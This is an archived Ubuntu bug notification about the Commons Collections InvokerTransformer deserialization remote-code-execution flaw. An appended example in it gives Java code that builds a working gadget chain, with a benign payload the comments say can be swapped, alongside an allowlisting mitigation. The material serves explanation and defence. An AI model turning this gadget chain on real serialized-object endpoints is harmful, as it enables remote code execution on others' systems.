[Bug 1514985] [NEW] Arbitrary remote code execution with InvokerTransformer

Steve Beattie sbeattie at ubuntu.com
Tue Nov 10 19:52:54 UTC 2015


*** This bug is a security vulnerability ***

Public security bug reported:

Upstream bug report:
https://issues.apache.org/jira/browse/COLLECTIONS-580

With InvokerTransformer serializable collections can be built that
execute arbitrary Java code.
sun.reflect.annotation.AnnotationInvocationHandler#readObject invokes
#entrySet and #get on a deserialized collection. If you have an endpoint
that accepts serialized Java objects (JMX, RMI, remote EJB, ...) you can
combine the two to create an arbitrary remote code execution vulnerability.

https://github.com/frohoff/ysoserial

http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

[No CVE has been assigned for this yet]

** Affects: libcommons-collections3-java (Ubuntu)
     Importance: Undecided
         Status: New

** Affects: libcommons-collections4-java (Ubuntu)
     Importance: Undecided
         Status: New

** Description changed:

  With InvokerTransformer serializable collections can be built that
  execute arbitrary Java code.
  sun.reflect.annotation.AnnotationInvocationHandler#readObject invokes
  #entrySet and #get on a deserialized collection. If you have an endpoint
  that accepts serialized Java objects (JMX, RMI, remote EJB, ...) you can
  combine the two to create an arbitrary remote code execution vulnerability.
  
- I don't know of a good fix short of removing InvokerTransformer or
- making it not Serializable. Both probably break existing applications.
- 
- This is not my research, but has been discovered by other people.
- 
  https://github.com/frohoff/ysoserial
  
  http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
  
  [No CVE has been assigned for this yet]

** Also affects: libcommons-collections4-java (Ubuntu)
   Importance: Undecided
       Status: New

** Description changed:

+ Upstream bug report:
+ https://issues.apache.org/jira/browse/COLLECTIONS-580
+ 
  With InvokerTransformer serializable collections can be built that
  execute arbitrary Java code.
  sun.reflect.annotation.AnnotationInvocationHandler#readObject invokes
  #entrySet and #get on a deserialized collection. If you have an endpoint
  that accepts serialized Java objects (JMX, RMI, remote EJB, ...) you can
  combine the two to create an arbitrary remote code execution vulnerability.
  
  https://github.com/frohoff/ysoserial
  
  http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
  
  [No CVE has been assigned for this yet]

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to libcommons-collections3-java in
Ubuntu.
https://bugs.launchpad.net/bugs/1514985

Title:
  Arbitrary remote code execution with InvokerTransformer

Status in libcommons-collections3-java package in Ubuntu:
  New
Status in libcommons-collections4-java package in Ubuntu:
  New

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/libcommons-collections3-java/+bug/1514985/+subscriptions
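The mechanism the report describes, shown end to end as an added example (this is not code from the bug report, from ysoserial or from the Apache Commons project). It assumes commons-collections 3.2.1 on the classpath, the version the report is about; in 3.2.2 and later the first half throws UnsupportedOperationException because InvokerTransformer refuses to deserialize unless a system property re-enables it. The class, method and property names used in the transformer chain are chosen here to keep the demonstration harmless: the chain reflectively calls System.getProperty("java.version") rather than Runtime.exec, but the shape is identical, and the method name and arguments all come out of the serialized stream. The second half is the mitigation the report does not mention, a look-ahead ObjectInputStream that rejects unexpected classes in resolveClass() before any instance, and therefore any readObject(), exists; AllowlistObjectInputStream and buildGadgetMap are names invented for this example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

public class InvokerTransformerDemo {

    // A LazyMap whose value factory is a transformer chain. Every lookup of a
    // missing key runs the chain: start from the System class, reflectively
    // fetch System.getProperty(String), then invoke it. The payload is benign
    // (it reads "java.version"); an attacker only has to swap the class,
    // method name and arguments, all of which are plain serialized fields.
    @SuppressWarnings("unchecked")
    static Map<Object, Object> buildGadgetMap() {
        Transformer[] chain = new Transformer[] {
            new ConstantTransformer(System.class),
            new InvokerTransformer("getMethod",
                new Class[] { String.class, Class[].class },
                new Object[] { "getProperty", new Class[] { String.class } }),
            new InvokerTransformer("invoke",
                new Class[] { Object.class, Object[].class },
                new Object[] { null, new Object[] { "java.version" } })
        };
        return LazyMap.decorate(new HashMap<Object, Object>(), new ChainedTransformer(chain));
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Look-ahead deserialization (hypothetical name). resolveClass() is called
    // for every class descriptor in the stream before an instance is created,
    // so refusing a class here stops a gadget chain before any readObject()
    // runs. An allowlist of the types the endpoint really expects is the
    // robust form; a denylist of known gadgets only covers what is known.
    static final class AllowlistObjectInputStream extends ObjectInputStream {
        private final Set<String> allowed;

        AllowlistObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
            super(in);
            this.allowed = allowed;
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc)
                throws IOException, ClassNotFoundException {
            String name = desc.getName();
            if (!allowed.contains(name)) {
                throw new InvalidClassException(name, "not permitted by deserialization allowlist");
            }
            return super.resolveClass(desc);
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] payload = serialize(buildGadgetMap());

        // 1. Plain ObjectInputStream: the map deserializes quietly, and the
        //    chain fires on the first lookup. AnnotationInvocationHandler's
        //    readObject() performs exactly such a lookup (entrySet/get), which
        //    is what turns this into code execution at deserialization time.
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            Map<?, ?> restored = (Map<?, ?>) in.readObject();
            System.out.println("chain ran on get(): " + restored.get("any key"));
        }

        // 2. Allowlisting stream: the LazyMap descriptor is the first class in
        //    the stream that is not on the list, so it is refused before any
        //    transformer is instantiated.
        Set<String> expected = new HashSet<>(Arrays.asList("java.util.HashMap"));
        try (ObjectInputStream in =
                 new AllowlistObjectInputStream(new ByteArrayInputStream(payload), expected)) {
            in.readObject();
            System.out.println("unexpected: payload accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Compile and run with the commons-collections 3.2.1 jar on the classpath. On Java 9 and later the same allowlist can be expressed without subclassing through the standard ObjectInputFilter (JEP 290), for example `in.setObjectInputFilter(ObjectInputFilter.Config.createFilter("java.util.HashMap;!*"))`; either way the decision is made per class descriptor, ahead of instantiation, which is the property that matters against this class of bug.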



More information about the foundations-bugs mailing list